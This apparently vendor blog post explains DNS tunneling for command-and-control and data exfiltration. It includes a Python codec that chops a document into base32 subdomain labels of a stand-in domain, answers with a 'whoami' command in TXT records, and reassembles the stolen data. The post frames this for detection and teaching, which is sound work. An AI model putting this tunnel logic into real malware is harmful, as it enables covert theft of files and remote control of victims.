DNS is an amazing channel for attackers. Outbound port 53 is almost always allowed through the firewall, and DNS logs are so voluminous and noisy that few teams actually analyze them. APTs like OilRig have had a field day using DNS to quietly control victim machines with little risk of detection.
Let's ditch the slides and hop right into a live DNS server. We'll demo a few DNS-based attacks, crack open Wireshark to analyze the traffic, and discuss mitigation techniques and the DNS-based detections in Varonis.
Here's an overview of the attack:
- Stand up a plain old DNS server
- Register a domain name
- Delegate the domain's NS records to our (malicious) server, so every lookup under that domain is forwarded to us by the victim's recursive resolver
- Infect a victim with a tiny piece of malware that talks to our DNS server by issuing ordinary lookups for names under that domain
- Issue commands from our DNS server back to the victim machine via DNS responses alone (for example, in TXT records)
- Find a document to steal, chop it up, encode the pieces as subdomain labels, and send them out in outbound DNS queries
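To make the mechanics of that last three steps concrete, here is a small, self-contained codec that shows both sides of the channel on the wire: the victim side chops a file into chunks and packs each one into the query name of a DNS TXT lookup, and the server side parses the query, stores the chunk, and answers with a TXT record carrying the next command. This is an added example written for this post, not the malware or the server used in the demo or any Varonis code; it uses only the Python standard library, never touches a socket, and the tunnel domain `c2.example.com`, the 30-byte chunk size and the command strings are assumptions chosen for illustration.

```python
"""Toy DNS tunnel codec (added example, not the demo's code). Stdlib only, no network I/O."""
import base64
import struct

TUNNEL_DOMAIN = "c2.example.com"   # assumption: the domain we registered and delegated to our server
CHUNK = 30                         # 30 raw bytes -> 48 base32 chars, fits inside one 63-char label
QTYPE_TXT = 16


def encode_name(name: str) -> bytes:
    """Wire-encode a domain name as length-prefixed labels (RFC 1035)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode()
        if len(raw) > 63:
            raise ValueError("label too long: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(packet: bytes, offset: int):
    """Read an uncompressed name at offset; return (name, offset after the name)."""
    labels = []
    while True:
        n = packet[offset]
        offset += 1
        if n == 0:
            return ".".join(labels), offset
        if n & 0xC0:
            raise ValueError("compression pointers are not expected in a question name")
        labels.append(packet[offset:offset + n].decode())
        offset += n


def exfil_queries(data: bytes) -> list:
    """Victim side: chop data into chunks, encode each as <seq>.<base32>.<domain>, wrap in a TXT query."""
    packets = []
    for seq, i in enumerate(range(0, len(data), CHUNK)):
        b32 = base64.b32encode(data[i:i + CHUNK]).decode().rstrip("=").lower()
        name = "%d.%s.%s" % (seq, b32, TUNNEL_DOMAIN)
        # Header: id, flags (RD set), qdcount=1. Real malware randomizes the id; we reuse seq.
        header = struct.pack("!HHHHHH", seq & 0xFFFF, 0x0100, 1, 0, 0, 0)
        packets.append(header + encode_name(name) + struct.pack("!HH", QTYPE_TXT, 1))
    return packets


def server_handle(packet: bytes, store: dict, pending_cmd: str) -> bytes:
    """Server side: pull the chunk out of the query name, then answer with a TXT record holding a command."""
    qid = struct.unpack("!H", packet[:2])[0]
    name, off = decode_name(packet, 12)
    labels = name.split(".")
    if name.endswith("." + TUNNEL_DOMAIN) and len(labels) == len(TUNNEL_DOMAIN.split(".")) + 2:
        seq, b32 = labels[0], labels[1]
        padded = b32 + "=" * (-len(b32) % 8)          # restore the padding stripped on the way out
        store[int(seq)] = base64.b32decode(padded, casefold=True)
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; one question, one answer
    question = packet[12:off + 4]                              # echo the question section unchanged
    txt = pending_cmd.encode()
    rdata = bytes([len(txt)]) + txt                            # TXT rdata is <len><bytes> strings
    # Answer name is a pointer to the question name (0xC00C); TTL 0 so resolvers never cache the command.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_TXT, 1, 0, len(rdata)) + rdata
    return header + question + answer


def read_command(response: bytes) -> str:
    """Victim side: extract the command string from the TXT answer."""
    _, off = decode_name(response, 12)
    off += 4                      # skip qtype/qclass of the echoed question
    off += 2                      # skip the compression pointer used as the answer name
    rtype, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    if rtype != QTYPE_TXT:
        raise ValueError("unexpected answer type %d" % rtype)
    off += 10
    rdata, parts, i = response[off:off + rdlen], [], 0
    while i < len(rdata):
        n = rdata[i]
        parts.append(rdata[i + 1:i + 1 + n].decode())
        i += 1 + n
    return "".join(parts)


def reassemble(store: dict) -> bytes:
    """Server side: stitch stored chunks back together in sequence order."""
    return b"".join(store[k] for k in sorted(store))


if __name__ == "__main__":
    document = b"CONFIDENTIAL - constructed sample document for the demo, not a real file.\n" * 3
    store, commands = {}, []
    for query in exfil_queries(document):
        qname = decode_name(query, 12)[0]
        response = server_handle(query, store, "whoami")   # assumed command, carried in the TXT answer
        commands.append(read_command(response))
        print("query %-70s -> reply %r" % (qname, commands[-1]))
    print("server reassembled %d bytes, match=%s" % (len(reassemble(store)), reassemble(store) == document))
```

Run it and notice what the victim's recursive resolver (and your DNS logs) would see: a burst of lookups for long, high-entropy, never-repeated subdomains of one domain, all of type TXT, each answered with TTL 0. Those properties, rather than any single packet, are what the detections later in this post key on.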